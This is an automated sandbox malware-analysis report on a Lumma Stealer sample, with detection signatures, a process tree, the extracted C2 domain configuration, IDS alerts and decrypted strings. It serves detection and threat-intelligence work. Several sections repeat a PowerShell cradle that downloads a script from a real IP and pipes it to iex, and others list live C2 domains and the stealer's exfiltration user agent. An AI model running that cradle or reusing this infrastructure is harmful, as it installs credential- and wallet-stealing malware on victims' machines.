Edit tour

Windows Analysis Report
7IXl1M9JGV.exe

Overview

General Information

Sample name:	7IXl1M9JGV.exe
Analysis ID:	1551388
MD5:	826ac9d03e37048df300b013335098d9
SHA1:	a1c6214e85b826b769d931a20434224e42da28c1
SHA256:	a0aeb837cb5e762fc0b7d657c71d343e765cccb5780cd315756f682418b3cdfe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Compiles code for process injection (via .Net compiler)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: PowerShell Download and Execution Cradles

Suspicious execution chain found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64native

7IXl1M9JGV.exe (PID: 9084 cmdline: "C:\Users\user\Desktop\7IXl1M9JGV.exe" MD5: 826AC9D03E37048DF300B013335098D9)

conhost.exe (PID: 9092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 9144 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 9176 cmdline: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex" MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 8728 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 8748 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES267D.tmp" "c:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

RegAsm.exe (PID: 1752 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

chrome.exe (PID: 4212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" MD5: BB7C48CDDDE076E7EB44022520F40F77)

chrome.exe (PID: 1664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2240,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2252 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)

chrome.exe (PID: 9224 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --no-subproc-heap-profiling --field-trial-handle=3808,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=5316 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)

svchost.exe (PID: 7444 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: F586835082F632DC8D9404D83BC16316)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["conceszustyb.shop", "moutheventushz.shop", "respectabosiz.shop", "worddosofrm.shop", "mutterissuen.shop", "nightybinybz.shop", "bakedstusteeb.shop", "standartedby.shop", "knifedxejsu.cyou"], "Build id": "HpOoIh--@topgcr"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7IXl1M9JGV.exe", ParentImage: C:\Users\user\Desktop\7IXl1M9JGV.exe, ParentProcessId: 9084, ParentProcessName: 7IXl1M9JGV.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 9144, ProcessName: cmd.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 9176, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline", ProcessId: 8728, ProcessName: csc.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9144, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 9176, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7IXl1M9JGV.exe", ParentImage: C:\Users\user\Desktop\7IXl1M9JGV.exe, ParentProcessId: 9084, ParentProcessName: 7IXl1M9JGV.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 9144, ProcessName: cmd.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 9176, TargetFilename: C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9144, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 9176, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 892, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7444, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 9176, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline", ProcessId: 8728, ProcessName: csc.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T17:55:14.245210+0100	2028371	3	Unknown Traffic	192.168.11.20	49711	104.21.19.177	443	TCP
2024-11-07T17:55:15.081146+0100	2028371	3	Unknown Traffic	192.168.11.20	49712	104.21.19.177	443	TCP
2024-11-07T17:55:21.478914+0100	2028371	3	Unknown Traffic	192.168.11.20	49720	104.21.19.177	443	TCP
2024-11-07T17:55:22.553138+0100	2028371	3	Unknown Traffic	192.168.11.20	49724	104.21.19.177	443	TCP
2024-11-07T17:55:23.297760+0100	2028371	3	Unknown Traffic	192.168.11.20	49725	104.21.19.177	443	TCP
2024-11-07T17:55:24.379486+0100	2028371	3	Unknown Traffic	192.168.11.20	49727	104.21.19.177	443	TCP
2024-11-07T17:55:25.581150+0100	2028371	3	Unknown Traffic	192.168.11.20	49728	104.21.19.177	443	TCP
2024-11-07T17:55:26.470376+0100	2028371	3	Unknown Traffic	192.168.11.20	49729	104.21.19.177	443	TCP
2024-11-07T17:55:28.150953+0100	2028371	3	Unknown Traffic	192.168.11.20	49730	104.21.19.177	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T17:55:14.746759+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49711	104.21.19.177	443	TCP
2024-11-07T17:55:15.923601+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49712	104.21.19.177	443	TCP
2024-11-07T17:55:28.686722+0100	2054653	1	A Network Trojan was detected	192.168.11.20	49730	104.21.19.177	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T17:55:14.746759+0100	2049836	1	A Network Trojan was detected	192.168.11.20	49711	104.21.19.177	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T17:55:15.923601+0100	2049812	1	A Network Trojan was detected	192.168.11.20	49712	104.21.19.177	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T17:55:14.245210+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.11.20	49711	104.21.19.177	443	TCP
2024-11-07T17:55:15.081146+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.11.20	49712	104.21.19.177	443	TCP
2024-11-07T17:55:21.478914+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.11.20	49720	104.21.19.177	443	TCP
2024-11-07T17:55:22.553138+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.11.20	49724	104.21.19.177	443	TCP
2024-11-07T17:55:23.297760+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.11.20	49725	104.21.19.177	443	TCP
2024-11-07T17:55:24.379486+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.11.20	49727	104.21.19.177	443	TCP
2024-11-07T17:55:25.581150+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.11.20	49728	104.21.19.177	443	TCP
2024-11-07T17:55:26.470376+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.11.20	49729	104.21.19.177	443	TCP
2024-11-07T17:55:28.150953+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.11.20	49730	104.21.19.177	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T17:55:11.639670+0100	2019714	2	Potentially Bad Traffic	192.168.11.20	49710	147.45.44.131	80	TCP
2024-11-07T17:55:12.108473+0100	2019714	2	Potentially Bad Traffic	192.168.11.20	49710	147.45.44.131	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (knifedxejsu .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T17:55:13.869866+0100	2057284	1	Domain Observed Used for C2 Detected	192.168.11.20	51454	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T17:55:27.930071+0100	2048094	1	Malware Command and Control Activity Detected	192.168.11.20	49729	104.21.19.177	443	TCP

ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T17:55:12.109154+0100	2800029	1	Attempted User Privilege Gain	147.45.44.131	80	192.168.11.20	49710	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: standartedby.shop	Avira URL Cloud: Label: malware
Source: moutheventushz.shop	Avira URL Cloud: Label: malware
Source: https://knifedxejsu.cyou/	Avira URL Cloud: Label: malware
Source: bakedstusteeb.shop	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dll

Avira: detection malicious, Label: HEUR/AGEN.1300034

Found malware configuration

Source: 7.2.RegAsm.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["conceszustyb.shop", "moutheventushz.shop", "respectabosiz.shop", "worddosofrm.shop", "mutterissuen.shop", "nightybinybz.shop", "bakedstusteeb.shop", "standartedby.shop", "knifedxejsu.cyou"], "Build id": "HpOoIh--@topgcr"}

Multi AV Scanner detection for submitted file

Source: 7IXl1M9JGV.exe

ReversingLabs: Detection: 13%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dll

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: moutheventushz.shop
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: respectabosiz.shop
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: bakedstusteeb.shop
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: conceszustyb.shop
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nightybinybz.shop
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: standartedby.shop
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: mutterissuen.shop
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: worddosofrm.shop
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: knifedxejsu.cyou
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: HpOoIh--@topgcr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_00418D6F CryptUnprotectData,

7_2_00418D6F

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\scoped_dir4212_1753283128	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_4212_794435973	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Directory created: C:\Program Files\chrome_BITS_4212_794435973\BITA127.tmp	Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49730 version: TLS 1.2

Source: 7IXl1M9JGV.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\7IXl1M9JGV.exe

Code function: 0_2_00007FF7D77F8D4C FindFirstFileExW,

0_2_00007FF7D77F8D4C

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	7_2_0041B840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-62492198h]	7_2_0041B840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-5424758Ch]	7_2_0043D840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi+2DC2A8D6h]	7_2_0043D840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, eax	7_2_004358F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	7_2_0043F880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 3E416E49h	7_2_00439140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000E7h]	7_2_00439140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 3E416E49h	7_2_00439140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 33079CCDh	7_2_0043F9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+5E07836Bh]	7_2_0041DAD0
